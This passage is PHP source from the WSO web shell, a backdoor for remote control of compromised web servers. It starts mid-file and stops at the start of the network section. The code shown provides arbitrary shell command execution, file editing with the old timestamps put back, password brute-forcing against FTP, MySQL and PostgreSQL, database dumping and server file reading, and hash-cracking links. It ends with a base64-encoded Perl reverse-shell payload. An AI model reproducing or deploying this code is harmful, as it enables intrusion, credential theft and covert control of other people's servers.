126. <select name='p1'><option value='copy'>Copy</option><option value='move'>Move</option><option value='delete'>Delete</option>"; if(class_exists('ZipArchive')) echo "<option value='zip'>Compress (zip)</option><option value='unzip'>Uncompress (zip)</option>"; echo "<option value='tar'>Compress (tar.gz)</option>"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f'])) echo "<option value='paste'>Paste / Compress</option>"; echo "</select>&nbsp;"; if(!empty($_COOKIE['act']) && @count($_COOKIE['f']) && (($_COOKIE['act'] == 'zip') || ($_COOKIE['act'] == 'tar'))) echo "file name: <input type=text name=p2 value='wso_" . date("Ymd_His") . "." . ($_COOKIE['act'] == 'zip'?'zip':'tar.gz') . "'>&nbsp;"; echo "<input type='submit' value='>>'></td></tr></form></table></div>"; wsoFooter(); } function actionStringTools() { if(!function_exists('hex2bin')) {function hex2bin($p) {return decbin(hexdec($p));}} if(!function_exists('binhex')) {function binhex($p) {return dechex(bindec($p));}} if(!function_exists('hex2ascii')) {function hex2ascii($p){$r='';for($i=0;$i<strLen($p);$i+=2){$r.=chr(hexdec($p[$i].$p[$i+1]));}return $r;}} if(!function_exists('ascii2hex')) {function ascii2hex($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= sprintf('%02X',ord($p[$i]));return strtoupper($r);}} if(!function_exists('full_urlencode')) {function full_urlencode($p){$r='';for($i=0;$i<strlen($p);++$i)$r.= '%'.dechex(ord($p[$i]));return strtoupper($r);}} $stringTools = array( 'Base64 encode' => 'base64_encode', 'Base64 decode' => 'base64_decode', 'Url encode' => 'urlencode', 'Url decode' => 'urldecode', 'Full urlencode' => 'full_urlencode', 'md5 hash' => 'md5', 'sha1 hash' => 'sha1', 'crypt' => 'crypt', 'CRC32' => 'crc32', 'ASCII to HEX' => 'ascii2hex', 'HEX to ASCII' => 'hex2ascii', 'HEX to DEC' => 'hexdec', 'HEX to BIN' => 'hex2bin', 'DEC to HEX' => 'dechex', 'DEC to BIN' => 'decbin', 'BIN to HEX' => 'binhex', 'BIN to DEC' => 'bindec', 'String to lower case' => 'strtolower', 'String to upper case' => 'strtoupper', 'Htmlspecialchars' => 'htmlspecialchars', 'String length' => 'strlen', ); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); if(in_array($_POST['p1'], $stringTools)) echo $_POST['p1']($_POST['p2']); $temp = "document.getElementById('strOutput').style.display='';document.getElementById('strOutput').innerHTML='".addcslashes(htmlspecialchars(ob_get_clean()),"\n\r\t\\'\0")."';\n"; echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo '<h1>String conversions</h1><div class=content>'; echo "<form name='toolsForm' onSubmit='if(this.ajax.checked){a(null,null,this.selectTool.value,this.input.value);}else{g(null,null,this.selectTool.value,this.input.value);} return false;'><select name='selectTool'>"; foreach($stringTools as $k => $v) echo "<option value='".htmlspecialchars($v)."'>".$k."</option>"; echo "</select><input type='submit' value='>>'/> <input type=checkbox name=ajax value=1 ".(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'')."> send using AJAX<br><textarea name='input' style='margin-top:5px' class=bigarea>".(empty($_POST['p1'])?'':htmlspecialchars(@$_POST['p2']))."</textarea></form><pre class='ml1' style='".(empty($_POST['p1'])?'display:none;':'')."margin-top:5px' id='strOutput'>"; if(!empty($_POST['p1'])) { if(in_array($_POST['p1'], $stringTools))echo htmlspecialchars($_POST['p1']($_POST['p2'])); } echo"</pre></div><br><h1>Search files:</h1><div class=content>
127. <form onsubmit=\"g(null,this.cwd.value,null,this.text.value,this.filename.value);return false;\"><table cellpadding='1' cellspacing='0' width='50%'>
128. <tr><td width='1%'>Text:</td><td><input type='text' name='text' style='width:100%'></td></tr>
129. <tr><td>Path:</td><td><input type='text' name='cwd' value='". htmlspecialchars($GLOBALS['cwd']) ."' style='width:100%'></td></tr>
130. <tr><td>Name:</td><td><input type='text' name='filename' value='*' style='width:100%'></td></tr>
131. <tr><td></td><td><input type='submit' value='>>'></td></tr>
132. </table></form>"; function wsoRecursiveGlob($path) { if(substr($path, -1) != '/') $path.='/'; $paths = @array_unique(@array_merge(@glob($path.$_POST['p3']), @glob($path.'*', GLOB_ONLYDIR))); if(is_array($paths)&&@count($paths)) { foreach($paths as $item) { if(@is_dir($item)){ if($path!=$item) wsoRecursiveGlob($item); } else { if(empty($_POST['p2']) || @strpos(file_get_contents($item), $_POST['p2'])!==false) echo "<a href='#' onclick='g(\"FilesTools\",null,\"".urlencode($item)."\", \"view\",\"\")'>".htmlspecialchars($item)."</a><br>"; } } } } if(@$_POST['p3']) wsoRecursiveGlob($_POST['c']); echo "</div><br><h1>Search for hash:</h1><div class=content>
133. <form method='post' target='_blank' name='hf'>
134. <input type='text' name='hash' style='width:200px;'><br>
135. <input type='hidden' name='act' value='find'/>
136. <input type='button' value='hashcracking.ru' onclick=\"document.hf.action='https://hashcracking.ru/index.php';document.hf.submit()\"><br>
137. <input type='button' value='md5.rednoize.com' onclick=\"document.hf.action='http://md5.rednoize.com/?q='+document.hf.hash.value+'&s=md5';document.hf.submit()\"><br>
138. <input type='button' value='crackfor.me' onclick=\"document.hf.action='http://crackfor.me/index.php';document.hf.submit()\"><br>
139. </form></div>"; wsoFooter(); } function actionFilesTools() { if( isset($_POST['p1']) ) $_POST['p1'] = urldecode($_POST['p1']); if(@$_POST['p2']=='download') { if(@is_file($_POST['p1']) && @is_readable($_POST['p1'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=".basename($_POST['p1'])); if (function_exists("mime_content_type")) { $type = @mime_content_type($_POST['p1']); header("Content-Type: " . $type); } else header("Content-Type: application/octet-stream"); $fp = @fopen($_POST['p1'], "r"); if($fp) { while(!@feof($fp)) echo @fread($fp, 1024); fclose($fp); } }exit; } if( @$_POST['p2'] == 'mkfile' ) { if(!file_exists($_POST['p1'])) { $fp = @fopen($_POST['p1'], 'w'); if($fp) { $_POST['p2'] = "edit"; fclose($fp); } } } wsoHeader(); echo '<h1>File tools</h1><div class=content>'; if( !file_exists(@$_POST['p1']) ) { echo 'File not exists'; wsoFooter(); return; } $uid = @posix_getpwuid(@fileowner($_POST['p1'])); if(!$uid) { $uid['name'] = @fileowner($_POST['p1']); $gid['name'] = @filegroup($_POST['p1']); } else $gid = @posix_getgrgid(@filegroup($_POST['p1'])); echo '<span>Name:</span> '.htmlspecialchars(@basename($_POST['p1'])).' <span>Size:</span> '.(is_file($_POST['p1'])?wsoViewSize(filesize($_POST['p1'])):'-').' <span>Permission:</span> '.wsoPermsColor($_POST['p1']).' <span>Owner/Group:</span> '.$uid['name'].'/'.$gid['name'].'<br>'; echo '<span>Create time:</span> '.date('Y-m-d H:i:s',filectime($_POST['p1'])).' <span>Access time:</span> '.date('Y-m-d H:i:s',fileatime($_POST['p1'])).' <span>Modify time:</span> '.date('Y-m-d H:i:s',filemtime($_POST['p1'])).'<br><br>'; if( empty($_POST['p2']) ) $_POST['p2'] = 'view'; if( is_file($_POST['p1']) ) $m = array('View', 'Highlight', 'Download', 'Hexdump', 'Edit', 'Chmod', 'Rename', 'Touch'); else $m = array('Chmod', 'Rename', 'Touch'); foreach($m as $v) echo '<a href=# onclick="g(null,null,\'' . urlencode($_POST['p1']) . '\',\''.strtolower($v).'\')">'.((strtolower($v)==@$_POST['p2'])?'<b>[ '.$v.' ]</b>':$v).'</a> '; echo '<br><br>'; switch($_POST['p2']) { case 'view': echo '<pre class=ml1>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</pre>'; break; case 'highlight': if( @is_readable($_POST['p1']) ) { echo '<div class=ml1 style="background-color: #e1e1e1;color:black;">'; $code = @highlight_file($_POST['p1'],true); echo str_replace(array('<span ','</span>'), array('<font ','</font>'),$code).'</div>'; } break; case 'chmod': if( !empty($_POST['p3']) ) { $perms = 0; for($i=strlen($_POST['p3'])-1;$i>=0;--$i) $perms += (int)$_POST['p3'][$i]*pow(8, (strlen($_POST['p3'])-$i-1)); if(!@chmod($_POST['p1'], $perms)) echo 'Can\'t set permissions!<br><script>document.mf.p3.value="";</script>'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.chmod.value);return false;"><input type=text name=chmod value="'.substr(sprintf('%o', fileperms($_POST['p1'])),-4).'"><input type=submit value=">>"></form>'; break; case 'edit': if( !is_writable($_POST['p1'])) { echo 'File isn\'t writeable'; break; } if( !empty($_POST['p3']) ) { $time = @filemtime($_POST['p1']); $_POST['p3'] = substr($_POST['p3'],1); $fp = @fopen($_POST['p1'],"w"); if($fp) { @fwrite($fp,$_POST['p3']); @fclose($fp); echo 'Saved!<br><script>p3_="";</script>'; @touch($_POST['p1'],$time,$time); } } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,\'1\'+this.text.value);return false;"><textarea name=text class=bigarea>'; $fp = @fopen($_POST['p1'], 'r'); if($fp) { while( !@feof($fp) ) echo htmlspecialchars(@fread($fp, 1024)); @fclose($fp); } echo '</textarea><input type=submit value=">>"></form>'; break; case 'hexdump': $c = @file_get_contents($_POST['p1']); $n = 0; $h = array('00000000<br>','',''); $len = strlen($c); for ($i=0; $i<$len; ++$i) { $h[1] .= sprintf('%02X',ord($c[$i])).' '; switch ( ord($c[$i]) ) { case 0: $h[2] .= ' '; break; case 9: $h[2] .= ' '; break; case 10: $h[2] .= ' '; break; case 13: $h[2] .= ' '; break; default: $h[2] .= $c[$i]; break; } $n++; if ($n == 32) { $n = 0; if ($i+1 < $len) {$h[0] .= sprintf('%08X',$i+1).'<br>';} $h[1] .= '<br>'; $h[2] .= "\n"; } } echo '<table cellspacing=1 cellpadding=5 bgcolor=#222222><tr><td bgcolor=#333333><span style="font-weight: normal;"><pre>'.$h[0].'</pre></span></td><td bgcolor=#282828><pre>'.$h[1].'</pre></td><td bgcolor=#333333><pre>'.htmlspecialchars($h[2]).'</pre></td></tr></table>'; break; case 'rename': if( !empty($_POST['p3']) ) { if(!@rename($_POST['p1'], $_POST['p3'])) echo 'Can\'t rename!<br>'; else die('<script>g(null,null,"'.urlencode($_POST['p3']).'",null,"")</script>'); } echo '<form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.name.value);return false;"><input type=text name=name value="'.htmlspecialchars($_POST['p1']).'"><input type=submit value=">>"></form>'; break; case 'touch': if( !empty($_POST['p3']) ) { $time = strtotime($_POST['p3']); if($time) { if(!touch($_POST['p1'],$time,$time)) echo 'Fail!'; else echo 'Touched!'; } else echo 'Bad time format!'; } clearstatcache(); echo '<script>p3_="";</script><form onsubmit="g(null,null,\'' . urlencode($_POST['p1']) . '\',null,this.touch.value);return false;"><input type=text name=touch value="'.date("Y-m-d H:i:s", @filemtime($_POST['p1'])).'"><input type=submit value=">>"></form>'; break; } echo '</div>'; wsoFooter(); } function actionConsole() { if(!empty($_POST['p1']) && !empty($_POST['p2'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', true); $_POST['p1'] .= ' 2>&1'; } elseif(!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'stderr_to_out', 0); if(isset($_POST['ajax'])) { WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', true); ob_start(); echo "d.cf.cmd.value='';\n"; $temp = @iconv($_POST['charset'], 'UTF-8', addcslashes("\n$ ".$_POST['p1']."\n".wsoEx($_POST['p1']),"\n\r\t\\'\0")); if(preg_match("!.*cd\s+([^;]+)$!",$_POST['p1'],$match)) { if(@chdir($match[1])) { $GLOBALS['cwd'] = @getcwd(); echo "c_='".$GLOBALS['cwd']."';"; } } echo "d.cf.output.value+='".$temp."';"; echo "d.cf.output.scrollTop = d.cf.output.scrollHeight;"; $temp = ob_get_clean(); echo strlen($temp), "\n", $temp; exit; } if(empty($_POST['ajax'])&&!empty($_POST['p1'])) WSOsetcookie(md5($_SERVER['HTTP_HOST']).'ajax', 0); wsoHeader(); echo "<script>
140. if(window.Event) window.captureEvents(Event.KEYDOWN);
141. var cmds = new Array('');
142. var cur = 0;
143. function kp(e) {
144. var n = (window.Event) ? e.which : e.keyCode;
145. if(n == 38) {
146. cur--;
147. if(cur>=0)
148. document.cf.cmd.value = cmds[cur];
149. else
150. cur++;
151. } else if(n == 40) {
152. cur++;
153. if(cur < cmds.length)
154. document.cf.cmd.value = cmds[cur];
155. else
156. cur--;
157. }
158. }
159. function add(cmd) {
160. cmds.pop();
161. cmds.push(cmd);
162. cmds.push('');
163. cur = cmds.length-1;
164. }
165. </script>"; echo '<h1>Console</h1><div class=content><form name=cf onsubmit="if(d.cf.cmd.value==\'clear\'){d.cf.output.value=\'\';d.cf.cmd.value=\'\';return false;}add(this.cmd.value);if(this.ajax.checked){a(null,null,this.cmd.value,this.show_errors.checked?1:\'\');}else{g(null,null,this.cmd.value,this.show_errors.checked?1:\'\');} return false;"><select name=alias>'; foreach($GLOBALS['aliases'] as $n => $v) { if($v == '') { echo '<optgroup label="-'.htmlspecialchars($n).'-"></optgroup>'; continue; } echo '<option value="'.htmlspecialchars($v).'">'.$n.'</option>'; } echo '</select><input type=button onclick="add(d.cf.alias.value);if(d.cf.ajax.checked){a(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}else{g(null,null,d.cf.alias.value,d.cf.show_errors.checked?1:\'\');}" value=">>"> <nobr><input type=checkbox name=ajax value=1 '.(@$_COOKIE[md5($_SERVER['HTTP_HOST']).'ajax']?'checked':'').'> send using AJAX <input type=checkbox name=show_errors value=1 '.(!empty($_POST['p2'])||$_COOKIE[md5($_SERVER['HTTP_HOST']).'stderr_to_out']?'checked':'').'> redirect stderr to stdout (2>&1)</nobr><br/><textarea class=bigarea name=output style="border-bottom:0;margin:0;" readonly>'; if(!empty($_POST['p1'])) { echo htmlspecialchars("$ ".$_POST['p1']."\n".wsoEx($_POST['p1'])); } echo '</textarea><table style="border:1px solid #df5;background-color:#555;border-top:0px;" cellpadding=0 cellspacing=0 width="100%"><tr><td width="1%">$</td><td><input type=text name=cmd style="border:0px;width:100%;" onkeydown="kp(event);"></td></tr></table>'; echo '</form></div><script>d.cf.cmd.focus();</script>'; wsoFooter(); } function actionLogout() { setcookie(md5($_SERVER['HTTP_HOST']), '', time() - 3600); die('bye!'); } function actionSelfRemove() { if($_POST['p1'] == 'yes') if(@unlink(preg_replace('!\(\d+\)\s.*!', '', __FILE__))) die('Shell has been removed'); else echo 'unlink error!'; if($_POST['p1'] != 'yes') wsoHeader(); echo '<h1>Suicide</h1><div class=content>Really want to remove the shell?<br><a href=# onclick="g(null,null,\'yes\')">Yes</a></div>'; wsoFooter(); } function actionBruteforce() { wsoHeader(); if( isset($_POST['proto']) ) { echo '<h1>Results</h1><div class=content><span>Type:</span> '.htmlspecialchars($_POST['proto']).' <span>Server:</span> '.htmlspecialchars($_POST['server']).'<br>'; if( $_POST['proto'] == 'ftp' ) { function wsoBruteForce($ip,$port,$login,$pass) { $fp = @ftp_connect($ip, $port?$port:21); if(!$fp) return false; $res = @ftp_login($fp, $login, $pass); @ftp_close($fp); return $res; } } elseif( $_POST['proto'] == 'mysql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $res = @mysql_connect($ip.':'.$port?$port:3306, $login, $pass); @mysql_close($res); return $res; } } elseif( $_POST['proto'] == 'pgsql' ) { function wsoBruteForce($ip,$port,$login,$pass) { $str = "host='".$ip."' port='".$port."' user='".$login."' password='".$pass."' dbname=postgres"; $res = @pg_connect($str); @pg_close($res); return $res; } } $success = 0; $attempts = 0; $server = explode(":", $_POST['server']); if($_POST['type'] == 1) { $temp = @file('/etc/passwd'); if( is_array($temp) ) foreach($temp as $line) { $line = explode(":", $line); ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $line[0]) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($line[0]).'<br>'; } if(@$_POST['reverse']) { $tmp = ""; for($i=strlen($line[0])-1; $i>=0; --$i) $tmp .= $line[0][$i]; ++$attempts; if( wsoBruteForce(@$server[0],@$server[1], $line[0], $tmp) ) { $success++; echo '<b>'.htmlspecialchars($line[0]).'</b>:'.htmlspecialchars($tmp); } } } } elseif($_POST['type'] == 2) { $temp = @file($_POST['dict']); if( is_array($temp) ) foreach($temp as $line) { $line = trim($line); ++$attempts; if( wsoBruteForce($server[0],@$server[1], $_POST['login'], $line) ) { $success++; echo '<b>'.htmlspecialchars($_POST['login']).'</b>:'.htmlspecialchars($line).'<br>'; } } } echo "<span>Attempts:</span> $attempts <span>Success:</span> $success</div><br>"; } echo '<h1>Bruteforce</h1><div class=content><table><form method=post><tr><td><span>Type</span></td>' .'<td><select name=proto><option value=ftp>FTP</option><option value=mysql>MySql</option><option value=pgsql>PostgreSql</option></select></td></tr><tr><td>' .'<input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">' .'<input type=hidden name=a value="'.htmlspecialchars($_POST['a']).'">' .'<input type=hidden name=charset value="'.htmlspecialchars($_POST['charset']).'">' .'<span>Server:port</span></td>' .'<td><input type=text name=server value="127.0.0.1"></td></tr>' .'<tr><td><span>Brute type</span></td>' .'<td><label><input type=radio name=type value="1" checked> /etc/passwd</label></td></tr>' .'<tr><td></td><td><label style="padding-left:15px"><input type=checkbox name=reverse value=1 checked> reverse (login -> nigol)</label></td></tr>' .'<tr><td></td><td><label><input type=radio name=type value="2"> Dictionary</label></td></tr>' .'<tr><td></td><td><table style="padding-left:15px"><tr><td><span>Login</span></td>' .'<td><input type=text name=login value="root"></td></tr>' .'<tr><td><span>Dictionary</span></td>' .'<td><input type=text name=dict value="'.htmlspecialchars($GLOBALS['cwd']).'passwd.dic"></td></tr></table>' .'</td></tr><tr><td></td><td><input type=submit value=">>"></td></tr></form></table>'; echo '</div><br>'; wsoFooter(); } function actionSql() { class DbClass { var $type; var $link; var $res; function DbClass($type) { $this->type = $type; } function connect($host, $user, $pass, $dbname){ switch($this->type) { case 'mysql': if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true; break; case 'pgsql': $host = explode(':', $host); if(!$host[1]) $host[1]=5432; if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true; break; } return false; } function selectdb($db) { switch($this->type) { case 'mysql': if (@mysql_select_db($db))return true; break; } return false; } function query($str) { switch($this->type) { case 'mysql': return $this->res = @mysql_query($str); break; case 'pgsql': return $this->res = @pg_query($this->link,$str); break; } return false; } function fetch() { $res = func_num_args()?func_get_arg(0):$this->res; switch($this->type) { case 'mysql': return @mysql_fetch_assoc($res); break; case 'pgsql': return @pg_fetch_assoc($res); break; } return false; } function listDbs() { switch($this->type) { case 'mysql': return $this->query("SHOW databases"); break; case 'pgsql': return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'"); break; } return false; } function listTables() { switch($this->type) { case 'mysql': return $this->res = $this->query('SHOW TABLES'); break; case 'pgsql': return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'"); break; } return false; } function error() { switch($this->type) { case 'mysql': return @mysql_error(); break; case 'pgsql': return @pg_last_error(); break; } return false; } function setCharset($str) { switch($this->type) { case 'mysql': if(function_exists('mysql_set_charset')) return @mysql_set_charset($str, $this->link); else $this->query('SET CHARSET '.$str); break; case 'pgsql': return @pg_set_client_encoding($this->link, $str); break; } return false; } function loadFile($str) { switch($this->type) { case 'mysql': return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file")); break; case 'pgsql': $this->query("CREATE TABLE wso2(file text);COPY wso2 FROM '".addslashes($str)."';select file from wso2;"); $r=array(); while($i=$this->fetch()) $r[] = $i['file']; $this->query('drop table wso2'); return array('file'=>implode("\n",$r)); break; } return false; } function dump($table, $fp = false) { switch($this->type) { case 'mysql': $res = $this->query('SHOW CREATE TABLE `'.$table.'`'); $create = mysql_fetch_array($res); $sql = $create[1].";\n"; if($fp) fwrite($fp, $sql); else echo($sql); $this->query('SELECT * FROM `'.$table.'`'); $i = 0; $head = true; while($item = $this->fetch()) { $sql = ''; if($i % 1000 == 0) { $head = true; $sql = ";\n\n"; } $columns = array(); foreach($item as $k=>$v) { if($v === null) $item[$k] = "NULL"; elseif(is_int($v)) $item[$k] = $v; else $item[$k] = "'".@mysql_real_escape_string($v)."'"; $columns[] = "`".$k."`"; } if($head) { $sql .= 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')'; $head = false; } else $sql .= "\n\t,(".implode(", ", $item).')'; if($fp) fwrite($fp, $sql); else echo($sql); $i++; } if(!$head) if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n"); break; case 'pgsql': $this->query('SELECT * FROM '.$table); while($item = $this->fetch()) { $columns = array(); foreach($item as $k=>$v) { $item[$k] = "'".addslashes($v)."'"; $columns[] = $k; } $sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n"; if($fp) fwrite($fp, $sql); else echo($sql); } break; } return false; } }; $db = new DbClass($_POST['type']); if(@$_POST['p2']=='download') { $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']); $db->selectdb($_POST['sql_base']); switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } if(empty($_POST['file'])) { ob_start("ob_gzhandler", 4096); header("Content-Disposition: attachment; filename=dump.sql"); header("Content-Type: text/plain"); foreach($_POST['tbl'] as $v) $db->dump($v); exit; } elseif($fp = @fopen($_POST['file'], 'w')) { foreach($_POST['tbl'] as $v) $db->dump($v, $fp); fclose($fp); unset($_POST['p2']); } else die('<script>alert("Error! Can\'t open file");window.history.back(-1)</script>'); } wsoHeader(); echo "
166. <h1>Sql browser</h1><div class=content>
167. <form name='sf' method='post' onsubmit='fs(this);'><table cellpadding='2' cellspacing='0'><tr>
168. <td>Type</td><td>Host</td><td>Login</td><td>Password</td><td>Database</td><td></td></tr><tr>
169. <input type=hidden name=a value=Sql><input type=hidden name=p1 value='query'><input type=hidden name=p2 value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'') ."'>
170. <td><select name='type'><option value='mysql' "; if(@$_POST['type']=='mysql')echo 'selected'; echo ">MySql</option><option value='pgsql' "; if(@$_POST['type']=='pgsql')echo 'selected'; echo ">PostgreSql</option></select></td>
171. <td><input type=text name=sql_host value=\"". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."\"></td>
172. <td><input type=text name=sql_login value=\"". (empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])) ."\"></td>
173. <td><input type=text name=sql_pass value=\"". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."\"></td><td>"; $tmp = "<input type=text name=sql_base value=''>"; if(isset($_POST['sql_host'])){ if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) { switch($_POST['charset']) { case "Windows-1251": $db->setCharset('cp1251'); break; case "UTF-8": $db->setCharset('utf8'); break; case "KOI8-R": $db->setCharset('koi8r'); break; case "KOI8-U": $db->setCharset('koi8u'); break; case "cp866": $db->setCharset('cp866'); break; } $db->listDbs(); echo "<select name=sql_base><option value=''></option>"; while($item = $db->fetch()) { list($key, $value) = each($item); echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>'; } echo '</select>'; } else echo $tmp; }else echo $tmp; echo "</td>
174. <td><input type=submit value='>>' onclick='fs(d.sf);'></td>
175. <td><input type=checkbox name=sql_count value='on'" . (empty($_POST['sql_count'])?'':' checked') . "> count the number of rows</td>
176. </tr>
177. </table>
178. <script>
179. s_db='".@addslashes($_POST['sql_base'])."';
180. function fs(f) {
181. if(f.sql_base.value!=s_db) { f.onsubmit = function() {};
182. if(f.p1) f.p1.value='';
183. if(f.p2) f.p2.value='';
184. if(f.p3) f.p3.value='';
185. }
186. }
187. function st(t,l) {
188. d.sf.p1.value = 'select';
189. d.sf.p2.value = t;
190. if(l && d.sf.p3) d.sf.p3.value = l;
191. d.sf.submit();
192. }
193. function is() {
194. for(i=0;i<d.sf.elements['tbl[]'].length;++i)
195. d.sf.elements['tbl[]'][i].checked = !d.sf.elements['tbl[]'][i].checked;
196. }
197. </script>"; if(isset($db) && $db->link){ echo "<br/><table width=100% cellpadding=2 cellspacing=0>"; if(!empty($_POST['sql_base'])){ $db->selectdb($_POST['sql_base']); echo "<tr><td width=1 style='border-top:2px solid #666;'><span>Tables:</span><br><br>"; $tbls_res = $db->listTables(); while($item = $db->fetch($tbls_res)) { list($key, $value) = each($item); if(!empty($_POST['sql_count'])) $n = $db->fetch($db->query('SELECT COUNT(*) as n FROM '.$value.'')); $value = htmlspecialchars($value); echo "<nobr><input type='checkbox' name='tbl[]' value='".$value."'>&nbsp;<a href=# onclick=\"st('".$value."',1)\">".$value."</a>" . (empty($_POST['sql_count'])?'&nbsp;':" <small>({$n['n']})</small>") . "</nobr><br>"; } echo "<input type='checkbox' onclick='is();'> <input type=button value='Dump' onclick='document.sf.p2.value=\"download\";document.sf.submit();'><br>File path:<input type=text name=file value='dump.sql'></td><td style='border-top:2px solid #666;'>"; if(@$_POST['p1'] == 'select') { $_POST['p1'] = 'query'; $_POST['p3'] = $_POST['p3']?$_POST['p3']:1; $db->query('SELECT COUNT(*) as n FROM ' . $_POST['p2']); $num = $db->fetch(); $pages = ceil($num['n'] / 30); echo "<script>d.sf.onsubmit=function(){st(\"" . $_POST['p2'] . "\", d.sf.p3.value)}</script><span>".$_POST['p2']."</span> ({$num['n']} records) Page # <input type=text name='p3' value=" . ((int)$_POST['p3']) . ">"; echo " of $pages"; if($_POST['p3'] > 1) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']-1) . ")'>&lt; Prev</a>"; if($_POST['p3'] < $pages) echo " <a href=# onclick='st(\"" . $_POST['p2'] . '", ' . ($_POST['p3']+1) . ")'>Next &gt;</a>"; $_POST['p3']--; if($_POST['type']=='pgsql') $_POST['p2'] = 'SELECT * FROM '.$_POST['p2'].' LIMIT 30 OFFSET '.($_POST['p3']*30); else $_POST['p2'] = 'SELECT * FROM `'.$_POST['p2'].'` LIMIT '.($_POST['p3']*30).',30'; echo "<br><br>"; } if((@$_POST['p1'] == 'query') && !empty($_POST['p2'])) { $db->query(@$_POST['p2']); if($db->res !== false) { $title = false; echo '<table width=100% cellspacing=1 cellpadding=2 class=main style="background-color:#292929">'; $line = 1; while($item = $db->fetch()) { if(!$title) { echo '<tr>'; foreach($item as $key => $value) echo '<th>'.$key.'</th>'; reset($item); $title=true; echo '</tr><tr>'; $line = 2; } echo '<tr class="l'.$line.'">'; $line = $line==1?2:1; foreach($item as $key => $value) { if($value == null) echo '<td><i>null</i></td>'; else echo '<td>'.nl2br(htmlspecialchars($value)).'</td>'; } echo '</tr>'; } echo '</table>'; } else { echo '<div><b>Error:</b> '.htmlspecialchars($db->error()).'</div>'; } } echo "<br></form><form onsubmit='d.sf.p1.value=\"query\";d.sf.p2.value=this.query.value;document.sf.submit();return false;'><textarea name='query' style='width:100%;height:100px'>"; if(!empty($_POST['p2']) && ($_POST['p1'] != 'loadfile')) echo htmlspecialchars($_POST['p2']); echo "</textarea><br/><input type=submit value='Execute'>"; echo "</td></tr>"; } echo "</table></form><br/>"; if($_POST['type']=='mysql') { $db->query("SELECT 1 FROM mysql.user WHERE concat(`user`, '@', `host`) = USER() AND `File_priv` = 'y'"); if($db->fetch()) echo "<form onsubmit='d.sf.p1.value=\"loadfile\";document.sf.p2.value=this.f.value;document.sf.submit();return false;'><span>Load file</span> <input class='toolsInp' type=text name=f><input type=submit value='>>'></form>"; } if(@$_POST['p1'] == 'loadfile') { $file = $db->loadFile($_POST['p2']); echo '<br/><pre class=ml1>'.htmlspecialchars($file['file']).'</pre>'; } } else { echo htmlspecialchars($db->error()); } echo '</div>'; wsoFooter(); } function actionNetwork() { wsoHeader(); $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7"; 